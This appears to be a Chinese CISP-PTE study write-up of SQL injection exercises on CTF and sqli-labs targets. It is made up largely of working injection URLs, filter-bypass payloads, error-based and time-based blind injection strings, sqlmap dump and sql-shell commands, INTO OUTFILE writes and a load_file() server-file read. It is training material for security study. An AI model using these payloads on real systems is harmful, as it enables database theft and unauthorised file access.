【CISP |
您所在的位置:网站首页 › web基础题目 › 【CISP |
文章目录
【CISP-PTE】SQL注入练习题1. 今年的春节,不同往年1.1 手工注入1.2 sqlmap 注入
2.文章发布系统3. 文章发布系统24. [第一章 web入门]SQL注入-15.sqlilabs 1-156 宽字节注入 [极客大挑战 2019]HardSQL 17. sql 文件读取
【CISP-PTE】SQL注入练习题
1. 今年的春节,不同往年
http://140.210.203.168:28881 1.1 手工注入题目明确提示过滤了注释符 # – 通过单引号闭合,并注释绕过 闭合 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1回显sql select * from Article where uuid = '983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1'闭合 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1闭合成功 2. 爆列 逐一尝试 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5 or 1='1 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5,6 or 1='1发现列数为6时,回显字段2 3. 爆库 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,database(),3,4,5,6 or 1='1爆出库名为 web 4. 爆表 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),3,4,5,6 or 1='1爆出有两个表 Article IS_KEY 5. 爆表is_key的列 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='IS_KEY'),3,4,5,6 and 1='1爆出列为haha 6. 爆字段 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(haha) from IS_KEY ),3,4,5,6 and 1='1得到key1:abcd1234 1.2 sqlmap 注入 注入 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 爆库 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 --current-db 爆表 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web --tables 爆列 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY --columns 爆字段 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY -C"haha" --dump 2.文章发布系统http://140.210.203.168:17111/admin.php sqlmap注入 爆库 python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 --current-db爆表 python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web --tables爆列 python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web -T users1 --columns爆字段 python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web -T users1 -C“XremarkX4354” --dump 3. 文章发布系统2sqlmap注入并执行sql-shell http://118.195.198.108:20000 注册用户 发布文章抓包保存为sql.txt sqlmap爆库 python sqlmap.py -r sql.txt --risk 3 --level 5 --current-db爆表 python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web --tables爆列 python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 --columns爆字段 python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 -C“username,ox3a,password” --dump发现无法爆出字段 总结已获得的信息 库 2web 表 users1 列 username password sqlmap执行sql shell python sqlmap.py -r sql.txt --sql-shell select * from 2web.users1 limit 1 或者 select * from 2web.users1 where username='admin'或者 直接sqlmap执行sql python sqlmap.py -r sql.txt -sql-query="select * from 2web.users1 limit 1" 4. [第一章 web入门]SQL注入-1http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81 union联合注入 闭合 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 #发现# 被过滤 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 %23 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 --+ %23 和--+未被过滤 闭合成功爆列 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 30 --+ http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 3 --+爆出列数为3 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' union select 1,2,3 --+得到字段列数为3 回显 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,2,3 --+爆库 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,database(),3 --+ 得到库名 note爆表 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3 --+得到两张表 fl4g,notes 爆字段 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3 --+得到字段名为 fllllag 爆字段值 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(fllllag) from fl4g),3 and 1=1 --+得到 flag n1book{union_select_is_so_cool} 5.sqlilabs 1-15updatexml extractvalue http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1闭合 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1 and 1=1 %23#被过滤 报错注入 爆库 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1) %23爆表 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) %23发现一次只能回显1行,用limit逐一爆 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) %23emails http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 2,1)),1) %23 uagentshttp://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 3,1)),1) %23 usershttp://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 1,1)),1) %23 referershttp://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 4,1)),1) %23 为空 说明只有四个表 报字段http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1)),1) %23 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 1,1)),1) %23 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 2,1)),1) %23 爆出三个字段 id username password 爆字段内容 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users limit 0,1)),1) %23 XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'发现回显内容被截取,结果显示不全,参考文档 https://www.wolai.com/ctfhub/qXx5vurg8fRgasaZAVDo8W MID()函数用于从文本字段中提取字符。 SELECT MID(column_name,start[,length]) FROM table_name; Less-1 字符型注入 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-1/?id=1’ order by 5 --+Less-2 数字型注入 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-2/?id=1 order by 5less-3 ‘)闭合 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-3/?id=1’) --+less-4 “)闭合 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-4/?id=1”) --+Less-5 报错注入 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-5/?id=1’ and updatexml(1,concat(1,database()),1) --+ http://node2.anna.nssctf.cn:28656/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select email_id from emails limit 8,1)),1) --+Less-6 报错注入 “闭合 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-6/?id=1” and updatexml(1,concat(0x7e,database()),1)–+Less-7 outfile Less-7/?id=-1’ union select 1,2,@@datadir – # 获取数据存储路径 Less-7/?id=-1’ union select 1,2,@@basedir – # 获取安装路径 Less-7/?id=1’)) union select 1,2,3 into outfile “C:\phpStudy\WWW\sqli\Less-7\test.txt” – # sqlmap --slq-shellLess-8 布尔盲注 sqlmapLess-9 时间盲注 sqlmap ?id=1’ and sleep(5) – - #延迟5s ?id=1‘’ and sleep(5) – - ?id=1 and sleep(5) – - ?id=1‘) and sleep(5) – - ?id=1‘‘) and sleep(5) – - ?id=1’ and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)=‘i’,sleep(3),1)-- -Less-10 时间盲注 sqlmap ?id=1” and sleep(5) --+Less-11 报错注入 ’ and updatexml(1,concat(0x7e,database()),0) #Less-12 闭合判断 ") union select database(),2 #Less-13 闭合判断 1’) or 1=1 # 1’) and updatexml(1,concat(0x7e,(select database()),0x7e),1)#Less-14 闭合判断 1“ or 1=1 # 1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)# 6 宽字节注入 [极客大挑战 2019]HardSQL 1 http://8c4f169a-d2ef-4cdd-bd7f-74431c549dcc.node4.buuoj.cn:81/check.php?username=1&password=1%27or(updatexml(1,concat(0x7e,database()),1))%23 7. sql 文件读取http://192.168.213.22:81 通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。 注入判断 http://192.168.213.22:81/vulnerabilities/fu1.php?id=1' 报错,存在注入点,回显sql select * from article where id= ('1'') 闭合 --+ # 均被过滤 ;%00 闭合成功 http://192.168.213.22:81/vulnerabilities/fu1.php?id=1');%00 或者 (空格被过滤 用/**/或者%0a) http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/or/**/1=('1 爆字段个数 http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/order//by/**/4;%00 union回显 union被过滤 双写绕过 http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') //ununionion//select/**/1,2,3,4;%00 读取key文件 key:8b3h4a7v http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') //ununionion//select/**/1,2,3,load_file("/tmp/360/key");%00 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |